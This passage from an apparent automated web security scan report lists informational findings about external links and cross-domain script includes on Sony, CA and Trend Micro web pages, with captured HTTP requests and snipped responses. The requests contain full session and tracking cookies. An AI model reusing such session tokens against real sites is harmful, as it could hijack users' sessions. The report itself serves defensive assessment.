bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<link href="/css/AutoComplete.css" rel="stylesheet" type="text/css" media="screen" />-->

<link href="https://f.fontdeck.com/s/css/zH28mslJNSfrEtk/N8vkA5GMvEQ/*.ca.com/6172.css" rel="stylesheet" type="text/css"/>
<link href="/css/base.css" rel="stylesheet" type="text/css" media="screen"/>
...[SNIP]...
<link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />-->


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

12.10. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_appFooter.jsp

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /selfservice/common/viewdocument_appFooter.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 2794
Date: Tue, 06 Sep 2011 18:51:21 GMT


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
</A>&nbsp;
       <A onmouseover=" window.status='Learn about the latest Sony products at the Learning Center.'; return true" onmouseout="window.status=' '; return true" href="http://www.learningcenter.sony.us/home.php" target=_blank>Learning Center</A>
...[SNIP]...

12.11. http://www.kb.sony.com/selfservice/microsites/search.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/microsites/search.do

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true&region=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"}}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 6646
Date: Tue, 06 Sep 2011 18:51:20 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<head>
   <title>
       View Document
   </title>
   <script type="text/
...[SNIP]...
<body>
       One must have a frames-capable browser to use Knova Case Response. Get one here: <a href="http://mozilla.org">http://mozilla.org</a>
...[SNIP]...

12.12. http://www.kb.sony.com/selfservice/microsites/searchEntry.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/microsites/searchEntry.do

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true&region=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://esupport.sony.com/US/perl/index.pl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353067536

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:51:06 GMT
Content-Length: 172584

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Search Results</title>
<meta http-equi
...[SNIP]...
</A>&nbsp;
       <A onmouseover=" window.status='Learn about the latest Sony products at the Learning Center.'; return true" onmouseout="window.status=' '; return true" href="http://www.learningcenter.sony.us/home.php" target=_blank>Learning Center</A>
...[SNIP]...

13. Cross-domain script include
There are 21 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


13.1. http://blog.trendmicro.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?p=12640 HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/search/?q=xss&search.x=2&search.y=10&search=search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Link: <http://blog.trendmicro.com/12640>; rel=shortlink
Link: <http://blog.trendmicro.com/?p=12640>; rel=shortlink
X-Varnish: 1696291508
Content-Length: 55144
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:16:26 GMT
Date: Tue, 06 Sep 2011 18:16:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
</div>
        <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"

type="text/javascript">


</script>
...[SNIP]...
</a>
        <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

13.2. http://blog.trendmicro.com/a-snapshot-of-android-threats-infographic/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /a-snapshot-of-android-threats-infographic/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /a-snapshot-of-android-threats-infographic/ HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/?p=12640
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.1.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=1; bn_u=6923713914570485926; CMAVID=50021315153052143970353; cmRS=&t1=1315350993766&t2=-1&t3=1315350994638&lti=1315350994637&ln=&hr=/a-snapshot-of-android-threats-infographic/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/%3Fp%3D12640&rf=http%3A//us.trendmicro.com/us/search/%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22t%22%3A1315350994642%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fa-snapshot-of-android-threats-infographic%2F%22%2C%22l%22%3A%22A%20Snapshot%20of%20Android%20Threats%20%5BINFOGRAPHIC%5D%22%2C%22de%22%3A%7B%22su%22%3A%22XSS%20(Cross-Site%20Scripting)%20Very%20Much%20Alive%20and%20Kicking%20We%20were%20about%20to%20investigate%20further%20on%20malicious%20activities%20related%20to%20banner82(dot)com%2Fb.js%20but%20the%22%2C%22ti%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22nw%22%3A1098%2C%22nl%22%3A107%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Link: <http://blog.trendmicro.com/36257>; rel=shortlink
Link: <http://blog.trendmicro.com/?p=36257>; rel=shortlink
X-Varnish: 1696291652
Content-Length: 57514
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:16:33 GMT
Date: Tue, 06 Sep 2011 18:16:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
</div>
        <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"

type="text/javascript">


</script>
...[SNIP]...
</a>
        <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- event tracking for this event is off --><script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

13.3. http://blog.trendmicro.com/blackhat-2011-dangers-of-embedded-web-servers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /blackhat-2011-dangers-of-embedded-web-servers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blackhat-2011-dangers-of-embedded-web-servers/ HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/?s=xss&Submit=+Go+
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.4.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=4; bn_u=6923713914570485926; cmRS=&t1=1315351014612&t2=-1&t3=1315351015662&t4=1315351013744&lti=1315351015662&ln=&hr=/blackhat-2011-dangers-of-embedded-web-servers/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/%3Fs%3Dxss%26Submit%3D+Go+&rf=http%3A//blog.trendmicro.com/category/exploits/; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fs%3Dxss%26Submit%3D%2BGo%2B%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fexploits%2F%22%2C%22t%22%3A1315351015665%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fblackhat-2011-dangers-of-embedded-web-servers%2F%22%2C%22l%22%3A%22Blackhat%202011%3A%20Dangers%20of%20Embedded%20Web%20Servers%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%20results%20for%3A%20Xss%20%7C%20TrendLabs%20%7C%20Malware%20Blog%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A513%2C%22nl%22%3A120%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Link: <http://blog.trendmicro.com/36136>; rel=shortlink
Link: <http://blog.trendmicro.com/?p=36136>; rel=shortlink
X-Varnish: 1696292094
Content-Length: 54989
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:16:53 GMT
Date: Tue, 06 Sep 2011 18:16:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
</div>
        <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"

type="text/javascript">


</script>
...[SNIP]...
</a>
        <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- event tracking for this event is off --><script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

13.4. http://blog.trendmicro.com/category/exploits/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /category/exploits/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/exploits/ HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/a-snapshot-of-android-threats-infographic/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.2.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=2; bn_u=6923713914570485926; cmRS=&t1=1315350998493&t2=1315351000572&t3=1315351002621&t4=1315350994638&lti=1315351002613&ln=&hr=/category/exploits/&fti=&fn=UNDEFINED%3A0%3BUNDEFINED%3A1%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/a-snapshot-of-android-threats-infographic/&rf=http%3A//blog.trendmicro.com/%3Fp%3D12640; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fa-snapshot-of-android-threats-infographic%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22t%22%3A1315351002628%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fexploits%2F%22%2C%22l%22%3A%22Exploits%22%2C%22de%22%3A%7B%22su%22%3A%22In%20January%20this%20year%2C%20Trend%20Micro%20chairman%20and%20co-founder%20Steve%20Chang%20was%20quoted%20as%20saying%20that%20Android-based%20devices%20are%20less%20secure%20than%20those%20running%20on%20iOS.%22%2C%22ti%22%3A%22A%20Snapshot%20of%20Android%20Threats%20%5BINFOGRAPHIC%5D%20%7C%20Malware%20Blog%20%7C%20Trend%20Micro%22%2C%22nw%22%3A813%2C%22nl%22%3A120%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
X-Varnish: 1696291820
Content-Length: 61429
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:16:40 GMT
Date: Tue, 06 Sep 2011 18:16:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
